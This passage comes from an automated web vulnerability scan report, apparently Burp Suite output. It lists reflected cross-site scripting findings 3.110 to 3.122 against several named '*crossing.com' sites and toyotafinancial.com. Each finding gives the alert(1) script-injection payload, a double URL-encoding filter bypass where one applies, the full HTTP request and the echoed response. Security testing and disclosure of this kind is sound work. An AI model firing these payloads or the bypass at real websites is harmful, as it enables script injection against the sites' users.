Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113020

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.researchingcrossing.com/?c5ee5"><script>alert(1)</script>4bed916ba21=1">
...[SNIP]...

3.110. http://www.retailcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retailcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93fb6"><script>alert(1)</script>28a079ac530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?93fb6"><script>alert(1)</script>28a079ac530=1 HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ste5haotf5vmef1qsurie2n7n5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105739

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.retailcrossing.com/?93fb6"><script>alert(1)</script>28a079ac530=1">
...[SNIP]...

3.111. http://www.sciencescrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sciencescrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0897"><script>alert(1)</script>765803bdfda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f0897"><script>alert(1)</script>765803bdfda=1 HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8sa88hljrj6q4ofs3se5guljd6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139746

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sciencescrossing.com/?f0897"><script>alert(1)</script>765803bdfda=1">
...[SNIP]...

3.112. http://www.scientistcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scientistcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28639"><script>alert(1)</script>c7ffa7b203b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?28639"><script>alert(1)</script>c7ffa7b203b=1 HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=iurdrjelo6pic6sm8jh3gs4hm7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107101

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.scientistcrossing.com/?28639"><script>alert(1)</script>c7ffa7b203b=1">
...[SNIP]...

3.113. http://www.sellingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sellingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117a5"><script>alert(1)</script>7d8b1b4448d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?117a5"><script>alert(1)</script>7d8b1b4448d=1 HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dhcgj2evje60sqquu78rls5h52; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sellingcrossing.com/?117a5"><script>alert(1)</script>7d8b1b4448d=1">
...[SNIP]...

3.114. http://www.sqlcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sqlcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ef3"><script>alert(1)</script>f655a652a29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?66ef3"><script>alert(1)</script>f655a652a29=1 HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=imr0t828o1o340ptffl1rftdv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109142

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sqlcrossing.com/?66ef3"><script>alert(1)</script>f655a652a29=1">
...[SNIP]...

3.115. http://www.teenagercrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teenagercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8279"><script>alert(1)</script>68ad5a2e707 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d8279"><script>alert(1)</script>68ad5a2e707=1 HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:01 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9of761brn29jbgj1khe0hgrsv7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 99732

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.teenagercrossing.com/?d8279"><script>alert(1)</script>68ad5a2e707=1">
...[SNIP]...

3.116. http://www.telecomcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telecomcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c307"><script>alert(1)</script>2b1c4b9d948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8c307"><script>alert(1)</script>2b1c4b9d948=1 HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hkpor3jiobjf8rtm3qkl9ivgi5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.telecomcrossing.com/?8c307"><script>alert(1)</script>2b1c4b9d948=1">
...[SNIP]...

3.117. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8452f<img%20src%3da%20onerror%3dalert(1)>f19e8466b3e was submitted in the REST URL parameter 3. This input was echoed as 8452f<img src=a onerror=alert(1)>f19e8466b3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /consumer/ShowBinary/BEA%20Repository8452f<img%20src%3da%20onerror%3dalert(1)>f19e8466b3e/tfs/en_US/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:52 GMT
Content-length: 235
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Error authenticating to repository: BEA Repository8452f<img src=a onerror=alert(1)>f19e8466b3e
<p>
...[SNIP]...

3.118. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f005%253cscript%253ealert%25281%2529%253c%252fscript%253ef87a8930f75 was submitted in the REST URL parameter 4. This input was echoed as 9f005<script>alert(1)</script>f87a8930f75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs9f005%253cscript%253ealert%25281%2529%253c%252fscript%253ef87a8930f75/en_US/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:53 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs9f005<script>alert(1)</script>f87a8930f75/en_US/video/content/data.xml does not exist.
<p>
...[SNIP]...

3.119. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b750d%253cscript%253ealert%25281%2529%253c%252fscript%253e07d5c9ab6aa was submitted in the REST URL parameter 5. This input was echoed as b750d<script>alert(1)</script>07d5c9ab6aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_USb750d%253cscript%253ealert%25281%2529%253c%252fscript%253e07d5c9ab6aa/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:58 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_USb750d<script>alert(1)</script>07d5c9ab6aa/video/content/data.xml does not exist.
<p>
...[SNIP]...

3.120. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2843%253cscript%253ealert%25281%2529%253c%252fscript%253e33046238f3 was submitted in the REST URL parameter 6. This input was echoed as f2843<script>alert(1)</script>33046238f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/videof2843%253cscript%253ealert%25281%2529%253c%252fscript%253e33046238f3/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:00 GMT
Content-length: 236
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/videof2843<script>alert(1)</script>33046238f3/content/data.xml does not exist.
<p>
...[SNIP]...

3.121. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ce625%253cscript%253ealert%25281%2529%253c%252fscript%253e47ad2d14cf9 was submitted in the REST URL parameter 7. This input was echoed as ce625<script>alert(1)</script>47ad2d14cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/contentce625%253cscript%253ealert%25281%2529%253c%252fscript%253e47ad2d14cf9/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:01 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/video/contentce625<script>alert(1)</script>47ad2d14cf9/data.xml does not exist.
<p>
...[SNIP]...

3.122. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload b1c4e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7fa252dbe5 was submitted in the REST URL parameter 8. This input was echoed as b1c4e<script>alert(1)</script>f7fa252dbe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

